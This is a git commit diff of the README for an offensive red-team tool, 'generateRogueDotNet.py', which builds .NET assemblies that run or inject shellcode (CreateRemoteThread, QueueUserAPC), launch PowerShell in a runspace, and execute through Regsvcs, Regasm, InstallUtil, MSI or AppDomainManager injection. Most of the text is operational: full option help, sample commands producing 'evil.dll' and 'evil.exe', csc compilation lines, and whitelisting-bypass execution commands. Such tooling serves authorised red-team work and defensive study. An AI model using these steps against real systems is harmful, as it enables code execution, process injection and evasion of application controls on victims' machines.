Updated rogue-dot-net

This commit is contained in:
Mariusz B. / mgeeky 2023-05-18 02:22:50 +02:00
parent 280399c1b9
commit 76dd286035

View File

@ -1,69 +1,101 @@
## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution
Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by:
This script produces C# code that can:
- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/)
- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/)
- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/)
- run system command
- run shellcode in-process
- inject shellcode and execute with `CreateRemoteThread`
- inject shellcode and execute with `QueueUserAPC`
- run Powershell through a managed runspace
- a DLL that can be loaded with `regsvcs`, `regasm`, `installutil` LOLBINs
### Step 1: Generate key.snk file
It **doesnt** incorporate any of the following:
```
powershell -file build.ps1
```
- [D/Invoke](https://github.com/TheWover/DInvoke)
- [H/Invoke](https://gist.github.com/dr4k0nia/95bd2dc1cc09726f4aaaf920b9982f9d)
- Direct/Indirect syscalls
### Step 2: Generate source code file
All Win32 APIs are imported with [P/Invoke](https://github.com/dotnet/pinvoke).
Produced .NET assemblies can also be used to:
- run .NET code from MSI context (use `-M` flag)
- run .NET code as part of injected [AppDomainManager](https://github.com/TheWover/GhostLoader) (use `-A` flag)
### Usage
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
Usage:
```
python3 generateRogueDotNet.py --help
:: Rogue .NET Source Code Generation Utility ::
Comes with a few hardcoded C# code templates and an easy wrapper around csc.exe compiler
Mariusz Banach / mgeeky, <mb@binary-offensive.com>, '19-23
:: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
usage: .\generateRogueDotNet.py [options] <inputFile>
usage: .\generateRogueDotNet.py [options] <inputFile|cmdline>
positional arguments:
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
inputFile Input file to embedded into C# source code for --type regasm|plain. If --type exec was given, this parameter specifies command line to execute by the resulting assembly (environment variables will get expanded). May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
optional arguments:
options:
-h, --help show this help message and exit
-t {regasm,plain,exec,run-command}, --type {regasm,plain,exec,run-command}
Specifies type of payload to generate. "plain" - assembly with embedded shellcode/ps1/exe, "exec" - assembly that hardcodes supplied shell command in "inputFile|cmdline" parameter and then runs it, "run-command" exposes a method named --method which takes one string parameter being a command to run, "regasm" - produces
executable compatible with Regasm/Regsvcs/InstallUtil code execution primitives. Default: plain
-c {default,x86,x64}, --compile {default,x86,x64}
Compile the source code using x86 or x64 csc.exe and generate output EXE/DLL file depending on --output extension. Default: default - CPU independent executable will be produced.
-o PATH, --output PATH
Output path where to write produced assembly/C# code. Default: print resulting C# code to stdout
-s NAME, --namespace NAME
Specifies custom C# module namespace for the generated Task (for needs of shellcode loaders such as DotNetToJScript or Donut). Default: ProgramNamespace.
-n NAME, --module NAME
Specifies custom C# module name for the generated Task (for needs of shellcode loaders such as DotNetToJScript or Donut). Default: Program.
-m NAME, --method NAME
Specifies method name that could be used by DotNetToJS and alike deserialization techniques to invoke our shellcode. Default: Foo
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
```
-r, --raw (OBSOLETED) Specified input file is a raw Shellcode to be injected in self process in a separate Thread (VirtualAlloc + CreateThread)
-M, --msi-mode Compiled .NET assembly is to be used with MSI installer
-A, --appdomainmanager-mode
Defines additional public sealed class inheriting from AppDomainManager with name: "MyAppDomainManager". Useful for side-loading .NET applications through the AppDomainManager Injection attack (google up: TheWover/GhostLoader)
-C PARAMS, --extra-params PARAMS
Additional parameters to add to CSC compiler
--dotnet-ver {v2,v4,2,4}
Use specific .NET version for compilation (with --compile given). Default: v2
--queue-apc If --raw was specified, generate C# code template with CreateProcess + WriteProcessMemory + QueueUserAPC process injection technique instead of default CreateThread.
--target-process PATH
This option specifies target process path for remote process injection in --queue-apc technique. May use environment variables. May also contain command line for spawned process, example: --target-process "%windir%\system32\werfault.exe -l -u 1234"
Sample use case:
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
USE CASES:
```
python3 generateRogueDotNet.py -r notepad64.bin > program.cs
1) Generate .NET EXE assembly that injects shellcode into remote process and runs via QueueUserAPC:
cmd> py generateRogueDotNet.py calc64.bin -o evil.exe --queue-apc
:: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
2) Generate .NET DLL assembly that executes shellcode inline/in-process
cmd> py generateRogueDotNet.py calc64.bin -o evil.dll
[?] File specified as raw Shellcode.
3) Generate .NET v4 DLL assembly that executes shellcode in-process and will be used for building evil MSI:
cmd> py generateRogueDotNet.py calc64.bin -o evil.dll --dotnet-ver v4 -M
4) Run Powershell through a managed runspace:
cmd> py generateRogueDotNet.py evil.ps1 -o evil.exe --dotnet-ver v4
5) Generate .NET DLL assembly that runs shellcode and can be loaded with Regasm/Regsvcs/InstallUtil LOLBINs:
cmd> py generateRogueDotNet.py calc64.bin -o evil.dll -t regasm
5) Generate .NET assembly that executes hardcoded system command (calc.exe):
cmd> py generateRogueDotNet.py -o evil.dll -t exec calc.exe
6) Generate .NET v4 DLL assembly that executes shellcode in-process and will be used for AppDomainManager injection (aka TheWover/GhostLoader):
cmd> py generateRogueDotNet.py calc64.bin -o evil.dll --dotnet-ver v4 -A
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
```
### Step 3: Compilate library .NET Assembly
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
```
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
```
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
```
### Step 4: Code execution via Regsvcs, Regasm or InstallUtil:
### Regsvcs, Regasm or InstallUtil execution:
- x86:
```
@ -88,3 +120,4 @@ If you passed Powershell code to be launched in a .NET Runspace, then an additio
%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
```